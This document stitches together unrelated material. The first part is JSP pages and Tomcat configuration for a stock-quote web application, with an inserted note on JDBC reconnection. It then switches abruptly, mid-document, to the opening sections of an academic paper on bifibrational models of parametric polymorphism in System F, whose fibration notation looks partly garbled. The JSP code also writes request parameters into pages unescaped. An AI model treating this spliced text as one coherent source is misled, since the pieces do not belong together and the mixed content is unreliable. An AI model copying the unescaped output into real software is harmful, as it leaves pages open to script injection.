<tr> <td><div align="center"><font color="#FFFFFF" size="-1" face="Arial, Helvetica, sans-serif"><strong><a href="account/index.html">Account Information</a></strong></font></div></td> </tr>
</table>
</td>
<td width="86%"><table width="100%">
<tr><td>
<form name="form1" method="post" action="getQuote.jsp">
<p align="right"><font color="#FFFFFF"><strong><font size="-1">Get Quote: </font></strong></font>
<input name="stockName" type="text" id="stockName" size="10">
<input type="submit" name="Submit" value="GO">
</p>
</form>
<p><strong><font size="6">Top List</font></strong></p>
<table width="100%" border="2" align="center" cellpadding="2" cellspacing="2">
<tr>
<td><div align="center"><font size="-1">RANK</font></div></td>
<td><div align="center"><font size="-1">SYMBOL</font></div></td>
<td><div align="center"><font size="-1">MARKET</font></div></td>
</tr>
<%
Document d = tl.buildDocument(Integer.parseInt(request.getParameter("recNumb")));
Element root = d.getRootElement();
Element stockList = root.getChild("stockList");
List stocks = stockList.getChildren();
%>
<tr>
<td><div align="center"><font size="-1">PRICE</font></div></td>
<td><div align="center"><font size="-1">TIME</font></div></td>
<td><div align="center"><font size="-1">MATCHED SHARES</font></div></td>
</tr>
<%
for (int i = 0, size = stocks.size(); i < size; i++) {
    Element stock = (Element) stocks.get(i);
%>
<tr>
<td><div align="center"><font size="-1"><% out.print(stock.getAttribute("rank").getValue()); %></font></div></td>
<td><div align="center"><font size="-1"><% out.print(stock.getAttribute("symbol").getValue()); %></font></div></td>
<td><div align="center"><font size="-1"><% out.print(stock.getChild("market").getValue()); %></font></div></td>
<td><div align="center"><font size="-1"><% out.print(stock.getChild("matched").getChild("lastMatch").getChild("matchPrice").getValue()); %></font></div></td>
<td><div align="center"><font size="-1"><% out.print(stock.getChild("matched").getChild("lastMatch").getChild("matchTime").getValue()); %></font></div></td>
<td><div align="center"><font size="-1"><% out.print(stock.getChild("matched").getChild("matchedShares").getValue()); %></font></div></td>
</tr>
<% } %>
</table>

getQuote.jsp
<%@ page import="rfms_modules.*"%>
<%@ page import="org.jdom.input.*"%>
<%@ page import="java.sql.*"%>
<%@ page language="java" contentType="text/html"%>
<%@ page autoFlush = "true"%>
<%@ page session = "false"%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Real-Time Finance Management System - Portfolio Management</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body vLink=#ffe4ca aLink=#ffffff link=#ff00ff background="/images/bluebackground.gif">
<TABLE width=500 border=0 align="center" cellPadding=0 cellSpacing=0>
<TR>
</TR>
</TABLE>
Real-Time Finance Management System
Home Portfolio Reminders
<table>
<thead>
<tr>
<th></th>
<th>Debt Planning</th>
<th>Expenditures</th>
<th>Account Information</th>
</tr>
</thead>
</table>

```html
<p>
<form name="form1" method="post" action="getQuote.jsp">
<p align="center">Get Quote: </p>
<input name="stockName" type="text" id="stockName" size="10">
<input type="submit" name="Submit" value="GO">
</form>
</p>
```

Here is the quote that you requested for:

```jsp
<%
StockInfo si = new StockInfo();
String stockQuote = si.getSingleQuote(request.getParameter("stockName"));
out.println(stockQuote);
out.println("<br>");
out.println(StockInfo.getDate());
%>
```

<table>
<thead>
<tr> <th>Market Session</th> <th>Match Price</th> <th>Match Time</th> <th>Matched Shares</th> </tr>
</thead>
<tbody>
<tr> <td></td> <td></td> <td></td> <td></td> </tr>
<tr> <td></td> <td></td> <td></td> <td></td> </tr>
</tbody>
</table>
<p align="center"> </p>
</td> </tr></table>
</td> </tr></table>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</body>
</html>
// end getQuote.jsp

goingTimeAndSales.jsp
<%@ page import="rfms_modules.*"%>
<%@ page import="org.jdom.*, org.jdom.input.*, org.apache.xerces.parsers.*, java.sql.*, java.util.List"%>
<%@ page language="java" contentType="text/html"%>
<%@ page autoFlush = "true"%>
<%@ page session = "false"%>
<jsp:useBean id="ts" scope="page" class="rfms_modules.TimeAndSales"/>
<html>
Real-Time Finance Management System - Portfolio Management
Home Portfolio Management Reminders Debt Planning Expenditures
<tr> <td align="center" width="86%"><table width="100%">
<p align="center">
<form name="form1" method="post" action="getQuote.jsp">
<p align="right"> Get Quote:
<input name="stockName" type="text" id="stockName" size="10">
<input type="submit" name="Submit" value="GO">
</p>
</form>
</p>
</td></tr> </table></td> </tr>
<tr> <td align="center" width="86%">
<p align="center">
<%
String recNumbString = request.getParameter("recNumb");
int recNumbInt =
Integer.parseInt(recNumbString);
String symbol = request.getParameter("symbol");
out.println(recNumbString);
out.println(" ");
%>
</p>
</td>
</tr>
<tr>
<td align="center">
<p align="center"> Time and Sales </p>
</td>
</tr>
<p align="center"><strong><font size="-1">
<%
if (recNumbInt > 1) { out.print("Sales"); } else { out.print("Sale"); }
out.print(" for " + symbol);
%>
</font></strong></p>
<table width="100%" border="2" align="center" cellpadding="2" cellspacing="2">
<tr>
<td align="center"><strong><font size="-1">#</font></strong></td>
<td align="center"><strong><font size="-1">MATCHED<br>SHARES</font></strong></td>
<td align="center"><font size="-1">PRICE</font></td>
<td align="center"><font size="-1">TIME</font></td>
<td align="center"><font size="-1">MATCH<br>TYPE</font></td>
<td align="center"><font size="-1">REFERENCE<br>NUMBER</font></td>
</tr>
<tr>
<td align="center"><font size="-1">1</font></td>
<td align="center"><font size="-1">MATCHED<br>SHARES</font></td>
<td align="center"><font size="-1">PRICE</font></td>
<td align="center"><font size="-1">TIME</font></td>
<td align="center"><font size="-1">MATCH<br>TYPE</font></td>
<td align="center"><font size="-1">REFERENCE<br>NUMBER</font></td>
</tr>
<tr>
<td align="center"><font size="-1">1</font></td>
<td align="center"><strong><font size="-1">2</font></strong></td>
<td align="center"><font size="-1">PRICE</font></td>
<td align="center"><font size="-1">TIME</font></td>
<td align="center"><font size="-1">MATCH<br>TYPE</font></td>
<td align="center"><font size="-1">REFERENCE<br>NUMBER</font></td>
</tr>
</table>

**web.xml**

<?xml version="1.0" encoding="ISO-8859-1"?>
<!--
  Copyright 2004 The Apache Software Foundation

  Licensed under the Apache License, Version 2.0 (the "License");
  you may not use this file except in compliance with the License.
  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->

<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    version="2.4">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to Tomcat
  </description>

  <resource-ref>
    <description>
      Resource reference to a factory for java.sql.Connection
      instances that may be used for talking to a particular
      database that is configured in the server.xml file.
    </description>
    <res-ref-name>jdbc/rfms</res-ref-name>
    <res-type>javax.sql.DataSource</res-type>
    <res-auth>Container</res-auth>
  </resource-ref>

</web-app>
// end web.xml

**server.xml**

<!-- Example Server Configuration File -->
<!-- Note that component elements are nested corresponding to their
     parent-child relationships with each other -->

<!-- A "Server" is a singleton element that represents the entire JVM,
     which may contain one or more "Service" instances.  The Server
     listens for a shutdown command on the indicated port.

     Note:  A "Server" is not itself a "Container", so you may not
     define subcomponents such as "Valves" or "Loggers" at this level.
--> <Server port="8005" shutdown="SHUTDOWN"> <!-- Comment these entries out to disable JMX MBeans support used for the administration web application --> <Listener className="org.apache.catalina.mbeans.ServerLifecycleListener" /> <Listener className="org.apache.catalina.mbeans.GlobalResourcesLifecycleListener" /> <Listener className="org.apache.catalina.storeconfig.StoreConfigLifecycleListener" /> <!-- Global JNDI resources --> <GlobalNamingResources> <!-- Test entry for demonstration purposes --> <Environment name="simpleValue" type="java.lang.Integer" value="30"/> <!-- Editable user database that can also be used by UserDatabaseRealm to authenticate users --> <Resource name="UserDatabase" auth="Container" type="org.apache.catalina.UserDatabase" description="User database that can be updated and saved" factory="org.apache.catalina.users.MemoryUserDatabaseFactory" pathname="conf/tomcat-users.xml" /> </GlobalNamingResources> <!-- A "Service" is a collection of one or more "Connectors" that share a single "Container" (and therefore the web applications visible within that Container). Normally, that Container is an "Engine", but this is not required. Note: A "Service" is not itself a "Container", so you may not define subcomponents such as "Valves" or "Loggers" at this level. --> <!-- Define the Tomcat Stand-Alone Service --> <Service name="Catalina"> <!-- A "Connector" represents an endpoint by which requests are received and responses are returned. Each Connector passes requests on to the associated "Container" (normally an Engine) for processing. By default, a non-SSL HTTP/1.1 Connector is established on port 8080. You can also enable an SSL HTTP/1.1 Connector on port 8443 by following the instructions below and uncommenting the second Connector entry. 
     SSL support requires the following steps (see the SSL Config
     HOWTO in the Tomcat 5 documentation bundle for more detailed
     instructions):
     * If your JDK is version 1.3 or prior, download and install JSSE 1.0.2
       or later, and put the JAR files into "$JAVA_HOME/jre/lib/ext".
     * Execute:
         %JAVA_HOME%\bin\keytool -genkey -alias tomcat -keyalg RSA (Windows)
         $JAVA_HOME/bin/keytool -genkey -alias tomcat -keyalg RSA  (Unix)
       with a password value of "changeit" for both the certificate and
       the keystore itself.

     By default, DNS lookups are enabled when a web application calls
     request.getRemoteHost().  This can have an adverse impact on
     performance, so you can disable it by setting the "enableLookups"
     attribute to "false".  When DNS lookups are disabled,
     request.getRemoteHost() will return the String version of the
     IP address of the remote client.
-->

<!-- Define a non-SSL HTTP/1.1 Connector on port 8080 -->
<Connector port="8080"
           maxThreads="150" minSpareThreads="25" maxSpareThreads="75"
           enableLookups="false" redirectPort="8443" acceptCount="100"
           connectionTimeout="20000" disableUploadTimeout="true" />
<!-- Note: To disable connection timeouts, set connectionTimeout value
     to 0 -->

<!-- Note: To use gzip compression you could set the following properties:
        compression="on"
        compressionMinSize="2048"
        noCompressionUserAgents="gozilla, traviata"
        compressableMimeType="text/html, text/xml"
-->

<!-- Define a SSL HTTP/1.1 Connector on port 8443 -->
<Connector port="8443"
           maxThreads="150" minSpareThreads="25" maxSpareThreads="75"
           enableLookups="false" disableUploadTimeout="true"
           acceptCount="100" scheme="https" secure="true"
           clientAuth="false" sslProtocol="TLS" />

<!-- Define an AJP 1.3 Connector on port 8009 -->
<Connector port="8009" enableLookups="false" redirectPort="8443"
           protocol="AJP/1.3" />

<!-- Define a Proxied HTTP/1.1 Connector on port 8082 -->
<!-- See proxy documentation for more information about using this.
-->
<Connector port="8082"
           maxThreads="150" minSpareThreads="25" maxSpareThreads="75"
           enableLookups="false" acceptCount="100" connectionTimeout="20000"
           proxyPort="80" disableUploadTimeout="true" />

<!-- An Engine represents the entry point (within Catalina) that processes
     every request.  The Engine implementation for Tomcat stand alone
     analyzes the HTTP headers included with the request, and passes them
     on to the appropriate Host (virtual host). -->

<!-- You should set jvmRoute to support load-balancing via AJP ie:
     <Engine name="Standalone" defaultHost="localhost" jvmRoute="jvm1" />
-->

<!-- Define the top level container in our container hierarchy -->
<Engine name="Catalina" defaultHost="localhost">

<!-- The request dumper valve dumps useful debugging information about
     the request headers and cookies that were received, and the response
     headers and cookies that were sent, for all requests received by
     this instance of Tomcat.  If you care only about requests to a
     particular virtual host, or a particular application, nest this
     element inside the corresponding <Host> or <Context> entry instead.

     For a similar mechanism that is portable to all Servlet 2.4
     containers, check out the "RequestDumperFilter" Filter in the
     example application (the source for this filter may be found in
     "$CATALINA_HOME/webapps/examples/WEB-INF/classes/filters").

     Request dumping is disabled by default.  Uncomment the following
     element to enable it. -->
<!--
<Valve className="org.apache.catalina.valves.RequestDumperValve"/>
-->

<!-- Because this Realm is here, an instance will be shared globally -->

<!-- This Realm uses the UserDatabase configured in the global JNDI
     resources under the key "UserDatabase".  Any edits that are
     performed against this UserDatabase are immediately available
     for use by the Realm.
-->
<Realm className="org.apache.catalina.realm.UserDatabaseRealm"
       resourceName="UserDatabase"/>

<!-- Comment out the old realm but leave here for now in case we
     need to go back quickly -->

<!-- Replace the above Realm with one of the following to get a Realm
     stored in a database and accessed via JDBC -->

<!--
<Realm className="org.apache.catalina.realm.JDBCRealm"
       driverName="org.gjt.mm.mysql.Driver"
       connectionURL="jdbc:mysql://localhost/authority"
       connectionName="test" connectionPassword="test"
       userTable="users" userNameCol="user_name" userCredCol="user_pass"
       userRoleTable="user_roles" roleNameCol="role_name" />
-->

<!--
<Realm className="org.apache.catalina.realm.JDBCRealm"
       driverName="oracle.jdbc.driver.OracleDriver"
       connectionURL="jdbc:oracle:thin:@ntserver:1521:ORCL"
       connectionName="seott" connectionPassword="tiger"
       userTable="users" userNameCol="user_name" userCredCol="user_pass"
       userRoleTable="user_roles" roleNameCol="role_name" />
-->

<Realm className="org.apache.catalina.realm.JDBCRealm"
       driverName="sun.jdbc.odbc.JdbcOdbcDriver"
       connectionURL="jdbc:odbc:CATALINA"
       userTable="users" userNameCol="user_name" userCredCol="user_pass"
       userRoleTable="user_roles" roleNameCol="role_name" />

<!-- Define the default virtual host
     Note: XML Schema validation will not work with Xerces 2.2. -->
<Host name="localhost" appBase="webapps"
      unpackWARs="true" autoDeploy="true"
      xmlValidation="false" xmlNamespaceAware="false">

<!-- Defines a cluster for this node.  By defining this element, every
     manager will be changed, so when running a cluster, make sure that
     you only have webapps in there that need to be clustered, and
     remove the other ones.
     A cluster has the following parameters:

     className = the fully qualified name of the cluster class
     name = a descriptive name for your cluster, can be anything
     mcastAddr = the multicast address, has to be the same for all the nodes
     mcastPort = the multicast port, has to be the same for all the nodes
     mcastBindAddr = bind the multicast socket to a specific address
     mcastTTL = the multicast TTL if you want to limit your broadcast
     mcastSoTimeout = the multicast read timeout
     mcastFrequency = the number of milliseconds in between sending a
                      "I'm alive" heartbeat
     mcastDropTime = the number of milliseconds before a node is considered
                     "dead" if no heartbeat is received
     tcpThreadCount = the number of threads to handle incoming replication
                      requests; optimal would be the same amount of threads
                      as nodes
     tcpListenAddress = the listen address (bind address) for TCP cluster
                        requests on this host, in case of multiple ethernet
                        cards; auto means that the address becomes
                        InetAddress.getLocalHost().getHostAddress()
     tcpListenPort = the tcp listen port
     tcpSelectorTimeout = the timeout (ms) for the Selector.select() method
                          in case the OS has a wakeup bug in java.nio;
                          set to 0 for no timeout
     printToScreen = true means that managers will also print to std.out
     expireSessionsOnShutdown = true means that sessions are expired when
                                this node shuts down
     useDirtyFlag = true means that we only replicate a session after
                    setAttribute,removeAttribute has been called;
                    false means to replicate the session after each request.
                    false means that replication would work for the
                    following piece of code
                    (only for SimpleTcpReplicationManager):
                    <%
                      HashMap map = (HashMap)session.getAttribute("map");
                      map.put("key","value");
                    %>
     replicationMode = can be either 'pooled', 'synchronous' or
                       'asynchronous'.
       * Pooled means that the replication happens using several sockets
         in a synchronous way.  Ie, the data gets replicated, then the
         request returns.  This is the same as the 'synchronous' setting
         except it uses a pool of sockets, hence it is multithreaded.
         This is the fastest and safest configuration.  To use this, also
         increase the nr of tcp threads that you have dealing with
         replication.
       * Synchronous means that the thread that executes the request is
         also the thread that replicates the data to the other nodes, and
         will not return until all nodes have received the information.
       * Asynchronous means that there is a specific 'sender' thread for
         each cluster node, so the request thread will queue the
         replication request into a "smart" queue, and then return to the
         client.  The "smart" queue is a queue where when a session is
         added to the queue, and the same session already exists in the
         queue from a previous request, that session will be replaced in
         the queue instead of replicating two requests.  This almost never
         happens, unless there is a large network delay.
-->
<!-- When configuring for clustering, you also add in a valve to catch
     all the requests coming in; at the end of the request, the session
     may or may not be replicated.  A session is replicated if and only
     if all the conditions are met:
     1. useDirtyFlag is true or setAttribute or removeAttribute has been
        called AND
     2. a session exists (has been created)
     3. the request is not trapped by the "filter" attribute

     The filter attribute is to filter out requests that could not modify
     the session, and hence we don't replicate the session after the end
     of this request.  The filter is negative, ie, anything you put in
     the filter, you mean to filter out, ie, no replication will be done
     on requests that match one of the filters.  The filter attribute is
     delimited by ;, so you can't escape out ; even if you wanted to.

     filter="*.gif;*.js;" means that we will not replicate the session
     after requests with the URI ending with .gif and .js are
     intercepted.

     The deployer element can be used to deploy apps cluster wide.
     Currently the deployment only deploys/undeploys to working members
     in the cluster so no WARs are copied upon startup of a broken node.
The deployer watches a directory (watchDir) for WAR files when watchEnabled="true" When a new war file is added the war gets deployed to the local instance, and then deployed to the other instances in the cluster. When a war file is deleted from the watchDir the war is undeployed locally and cluster wide --> <!-- <Cluster className="org.apache.catalina.cluster.tcp.SimpleTcpCluster" managerClassName="org.apache.catalina.cluster.session.DeltaManager" expireSessionsOnShutdown="false" useDirtyFlag="true" notifyListenersOnReplication="true"> <Membership className="org.apache.catalina.cluster.mcast.McastService" mcastAddr="228.0.0.4" mcastPort="45564" mcastFrequency="500" mcastDropTime="3000"/> <Receiver className="org.apache.catalina.cluster.tcp.ReplicationListener" tcpListenAddress="auto" tcpListenPort="4001" tcpSelectorTimeout="100" tcpThreadCount="6"/> <Sender className="org.apache.catalina.cluster.tcp.ReplicationTransmitter" replicationMode="pooled" ackTimeout="15000"/> <Valve className="org.apache.catalina.cluster.tcp.ReplicationValve" filter=".*\.gif;.*\.js;.*\.jpg;.*\.htm;.*\.html;.*\.txt;"/> <Deployer className="org.apache.catalina.cluster.deploy.FarmWarDeployer" tempDir="/tmp/war-temp/" deployDir="/tmp/war-deploy/" watchDir="/tmp/war-listen/" watchEnabled="false"/> </Cluster> --> <!-- Normally, users must authenticate themselves to each web app individually. Uncomment the following entry if you would like a user to be authenticated the first time they encounter a resource protected by a security constraint, and then have that user identity maintained across *all* web applications contained in this virtual host. --> <Valve className="org.apache.catalina.authenticator.SingleSignOn"/> Access log processes all requests for this virtual host. By default, log files are created in the "logs" directory relative to $CATALINA_HOME. If you wish, you can specify a different directory with the "directory" attribute. 
Specify either a relative (to $CATALINA_HOME) or absolute path to the
desired directory.  This access log implementation is optimized for
maximum performance, but is hardcoded to support only the "common" and
"combined" patterns.

Begin MyWebApp context definition.

<Resource name="jdbc/rfmsDS" auth="Container" type="javax.sql.DataSource"/>
<ResourceParams name="jdbc/rfmsDS">

<parameter>
  <name>factory</name>
  <value>org.apache.commons.dbcp.BasicDataSourceFactory</value>
</parameter>

The JDBC connection URL for connecting to your MySQL DB. The `autoReconnect=true` argument to the URL makes sure that the MySQL JDBC Driver will automatically reconnect if mysqld closed the connection. mysqld by default closes idle connections after 8 hours.

```xml
<parameter>
  <name>url</name>
  <value>jdbc:mysql://localhost/rfms?autoReconnect=true</value>
</parameter>
```

The MySQL JDBC driver class for DB connections (the MySQL username and password parameters are configured the same way).

```xml
<parameter>
  <name>driverClassName</name>
  <value>com.mysql.jdbc.Driver</value>
</parameter>
```

Maximum number of DB connections in pool. Make sure you configure your mysqld `max_connections` large enough to handle all of your DB connections. Set to 0 for no limit.

```xml
<parameter>
  <name>maxActive</name>
  <value>100</value>
</parameter>
```

Maximum number of idle DB connections to retain in pool. Set to 0 for no limit.

```xml
<parameter>
  <name>maxIdle</name>
  <value>30</value>
</parameter>
```

Maximum time to wait for a DB connection to become available in ms, in this example 10 seconds. An exception is thrown if this timeout is exceeded. Set to -1 to wait indefinitely.
```xml
<parameter>
  <name>maxWait</name>
  <value>10000</value>
</parameter>
```

</ResourceParams>
</Context>
</Host>
</Engine>
</Service>
</Server>
// end server.xml
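One detail in the pool configuration above is easy to get wrong: the `autoReconnect=true` flag must be joined to the base JDBC URL (`jdbc:mysql://localhost/rfms`) with a `?` separator, and with `&` if the URL already carries a query parameter. A minimal sketch, where the `JdbcUrl` class and `withAutoReconnect` helper are hypothetical names introduced only for illustration:

```java
// Hypothetical helper showing how the autoReconnect flag from the
// ResourceParams url parameter is appended with the correct separator.
public class JdbcUrl {

    static String withAutoReconnect(String baseUrl) {
        // '?' introduces the first query parameter, '&' any later one.
        String sep = baseUrl.contains("?") ? "&" : "?";
        return baseUrl + sep + "autoReconnect=true";
    }

    public static void main(String[] args) {
        System.out.println(withAutoReconnect("jdbc:mysql://localhost/rfms"));
    }
}
```

The same rule applies to any further MySQL driver options appended to the URL.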
# Bifibrational functorial semantics of parametric polymorphism

Neil Ghani (a), Patricia Johann (b), Fredrik Nordvall Forsberg (a), Federico Orsanigo (a), Tim Revell (a)

(a) University of Strathclyde, UK
(b) Appalachian State University, USA

**Abstract.** Reynolds’ theory of parametric polymorphism captures the invariance of polymorphically typed programs under change of data representation. Semantically, reflexive graph categories and fibrations are both known to give a categorical understanding of parametric polymorphism. This paper contributes further to this categorical perspective by showing the relevance of bifibrations. We develop a bifibrational framework for models of System F that are parametric, in that they verify the Identity Extension Lemma and Reynolds’ Abstraction Theorem. We also prove that our models satisfy expected properties, such as the existence of initial algebras and final coalgebras, and that parametricity implies dinaturality.

**Keywords:** Parametricity, logical relations, System F, fibred category theory.

## 1 Introduction

Strachey [30] called a polymorphic function parametric if its behaviour is uniform across all of its type instantiations. Reynolds [25] made this mathematically precise by formulating the notion of relational parametricity, in which the uniformity of parametric polymorphic functions is captured by requiring them to preserve all logical relations between instantiated types. Relational parametricity has proven to be a key technique for formally establishing properties of software systems, such as representation independence [1,6], equivalences between programs [15], and useful (“free”) theorems about programs from their types alone [31]. In this paper, we treat relational parametricity for the polymorphic $\lambda$-calculus System F [10], which forms the core of many modern programming languages and verification systems.
Hermida, Reddy, and Robinson [14] give a good introduction to relational parametricity. Since category theory underpins and informs many of the key ideas underlying modern programming languages, it is natural to ask whether it can provide a useful perspective on parametricity as well. Ma and Reynolds [19] developed the first categorical formulation of relational parametricity, but their models were complicated and challenging to understand. Moreover, Birkedal and Rosolini discovered that not all expected consequences of parametricity necessarily hold in their models (see [4]). Another line of work, begun by O’Hearn and Tennent [21] and Robinson and Rosolini [28], and later refined by Dunphy and Reddy [7], uses reflexive graphs to model relations and functors between reflexive graph categories to model types. This is the state of the art for functorial semantics for parametric polymorphism. Interpreting types as functors is conceptually elegant and Dunphy and Reddy show that this framework is powerful enough to prove expected results, such as the existence of initial algebras for strictly positive type expressions [5]. However, since reflexive graph categories are relatively unknown mathematical structures, much of this development has had to be carried out from scratch. We propose to instead take the more established fibrational view of logic from the outset, and thus to analyse parametricity through the powerful lens of categorical type theory [16]. In doing so, we follow an extensive line of work by Hermida [12,13] and Birkedal and Møgelberg [4], who use fibrations to construct sophisticated categorical models not only of parametricity, but also of its logical structure in terms of Abadi-Plotkin logic [24]. Abadi-Plotkin logic is a formal logic for parametric polymorphism that includes predicate logic and a polymorphic lambda calculus, and thus requires significant machinery to handle. 
Using this machinery, Birkedal and Møgelberg are able to go beyond Dunphy and Reddy’s results and, for instance, prove that all positive type expressions — not just the strictly positive ones as for Dunphy and Reddy — have initial algebras. However, these impressive results come at the price of the complexity of the notions involved. Our aim is to achieve the same results in a simpler setting, closer to Dunphy and Reddy’s functorial semantics. We end up with a notion of model in which each type is interpreted as an equality preserving fibred functor and each term is interpreted as a fibred natural transformation. This is quite similar to the models produced by the parametric completion process of Robinson and Rosolini [28] (see also Birkedal and Møgelberg [4, Section 8]) and to Mitchell and Scedrov’s relator model [20], but with a more general notion of relation given by a fibration. We thus combine the generality of Birkedal and Møgelberg’s fibrational models with the simplicity of Dunphy and Reddy’s functorial semantics. Our central innovation is the use of bifibrations to achieve this “sweet spot” in the study of parametricity. This is not necessary for the definition of our framework, for which Lawvere equality [17] (i.e., opreindexing along diagonals only) suffices, but it helps considerably with both the concrete interpretation of ∀-types [9] and the handling of graph relations. At a technical level, our strongest result is to use our simpler framework to recover all the expected consequences of parametricity that Birkedal and Møgelberg [4] prove using Abadi-Plotkin logic. In particular, we go beyond Dunphy and Reddy’s result by deriving, this time with a functorial semantics, initial algebras for all positive type expressions, rather than just for strictly positive ones. Nevertheless, this paper is in no way intended as the final word on fibrational parametricity. 
Instead, we hope the simple re-conceptualization of parametricity we offer here — replacing the usual categorical interpretations of types as functors and terms as natural transformations with their fibred counterparts — will open the way to the study of parametricity in richer settings, e.g., proof-relevant ones.¹

¹ We stress again that we are not trying to model all of Abadi-Plotkin logic, but rather only type systems involving parametric polymorphism. Indeed, with respect to Abadi-Plotkin logic, we could not hope to improve upon the results of Birkedal and Møgelberg [4], who give a sound and complete semantics.

**Structure of the paper:** In Section 2 we give a short introduction to bifibrations. We recall Reynolds’ relational interpretation of System F, the Identity Extension Lemma and the Abstraction Theorem in Section 3. We then extract bifibrational generalisations of these in Section 4, and construct our parametric models. In Section 5 we show that our models behave as expected by deriving initial algebras for all definable functors and proving that parametricity implies (di)naturality. Finally, we instantiate our framework to derive both “standard” and new models of relational parametricity in Section 6. Section 7 concludes and discusses future work.

## 2 A Fibrational Toolbox for Relational Parametricity

We give a brief introduction to fibrations; more details can be found in, e.g., [16].

**Definition 2.1** Let $U : \mathcal{E} \to \mathcal{B}$ be a functor. A morphism $g : Q \to P$ in $\mathcal{E}$ is cartesian over $f : X \to Y$ in $\mathcal{B}$ if $Ug = f$ and, for every $g' : Q' \to P$ in $\mathcal{E}$ with $Ug' = f \circ v$ for some $v : UQ' \to X$, there exists a unique $h : Q' \to Q$ with $Uh = v$ and $g' = g \circ h$.
A morphism $g : P \to Q$ in $\mathcal{E}$ is opcartesian over $f : X \to Y$ in $\mathcal{B}$ if $Ug = f$ and, for every $g' : P \to Q'$ in $\mathcal{E}$ with $Ug' = v \circ f$ for some $v : Y \to UQ'$, there exists a unique $h : Q \to Q'$ with $Uh = v$ and $g' = h \circ g$.

We write $f^{\S}_P$ for the cartesian morphism over $f$ with codomain $P$, and $f_{\S}^P$ for the opcartesian morphism over $f$ with domain $P$. Such morphisms are unique up to isomorphism. If $P$ is an object of $\mathcal{E}$ then we write $f^*P$ for the domain of $f^{\S}_P$ and $\Sigma_f P$ for the codomain of $f_{\S}^P$.

**Definition 2.2** A functor $U : \mathcal{E} \to \mathcal{B}$ is a fibration if for every object $P$ of $\mathcal{E}$ and every morphism $f : X \to UP$ in $\mathcal{B}$, there is a cartesian morphism $f^{\S}_P : f^*P \to P$ in $\mathcal{E}$ over $f$. Similarly, $U$ is an opfibration if for every object $P$ of $\mathcal{E}$ and every morphism $f : UP \to Y$ in $\mathcal{B}$, there is an opcartesian morphism $f_{\S}^P : P \to \Sigma_f P$ in $\mathcal{E}$ over $f$. A functor $U$ is a bifibration if it is both a fibration and an opfibration.

If $U : \mathcal{E} \to \mathcal{B}$ is a fibration, opfibration, or bifibration, then $\mathcal{E}$ is its total category and $\mathcal{B}$ is its base category. An object $P$ in $\mathcal{E}$ is over its image $UP$, and similarly for morphisms. A morphism is vertical if it is over $\mathrm{id}$. We write $\mathcal{E}_X$ for the fibre over an object $X$ of $\mathcal{B}$, i.e., the subcategory of $\mathcal{E}$ of objects over $X$ and morphisms over $\mathrm{id}_X$.

For $f : X \to Y$ in $\mathcal{B}$, the function mapping each object $P$ of $\mathcal{E}_Y$ to $f^*P$ extends to a functor $f^* : \mathcal{E}_Y \to \mathcal{E}_X$ mapping each morphism $k : P \to P'$ in $\mathcal{E}_Y$ to the unique morphism $f^*k$ with $k \circ f^{\S}_P = f^{\S}_{P'} \circ f^*k$. The universal property of $f^{\S}_{P'}$ ensures the existence and uniqueness of $f^*k$. We call $f^*$ the reindexing functor along $f$. A similar situation holds for opfibrations; the functor $\Sigma_f : \mathcal{E}_X \to \mathcal{E}_Y$ extending the function mapping each object $P$ of $\mathcal{E}_X$ to $\Sigma_f P$ is the opreindexing functor along $f$.

We write $|\mathcal{C}|$ for the discrete category of $\mathcal{C}$. If $U : \mathcal{E} \to \mathcal{B}$ is a functor, then the discrete functor $|U| : |\mathcal{E}| \to |\mathcal{B}|$ is induced by the restriction of $U$ to $|\mathcal{E}|$. If $n \in \mathbb{N}$, then $\mathcal{E}^n$ denotes the $n$-fold product of $\mathcal{E}$ in $\mathbf{Cat}$. The $n$-fold product of $U$, denoted $U^n : \mathcal{E}^n \to \mathcal{B}^n$, is the functor defined by $U^n(X_1, \ldots, X_n) = (UX_1, \ldots, UX_n)$.

**Lemma 2.3** If $U : \mathcal{E} \to \mathcal{B}$ is a functor then $|U| : |\mathcal{E}| \to |\mathcal{B}|$ is a bifibration. If $U$ is a (bi)fibration then so is $U^n : \mathcal{E}^n \to \mathcal{B}^n$ for any natural number $n$. $\square$

To formulate Reynolds’ set-theoretic model of relational parametricity categorically, we define the category $\mathrm{Rel}$ of relations over $\mathrm{Set}$ and the relations fibration on $\mathrm{Set}$ [16].

**Definition 2.4** The category $\mathrm{Rel}$ has triples $(A, B, R)$ as objects, where $A$, $B$, and $R$ are sets and $R \subseteq A \times B$. A morphism $(A, B, R) \to (A', B', R')$ is a pair $(f, g)$, where $f : A \to A'$ and $g : B \to B'$, such that if $(a, b) \in R$ then $(fa, gb) \in R'$. We write $(A, B, R)$ as just $R$ when $A$ and $B$ are immaterial or clear from context.

Note that $\mathrm{Rel}$ is not the category whose objects are sets and whose morphisms are relations, which also sometimes appears in the literature.
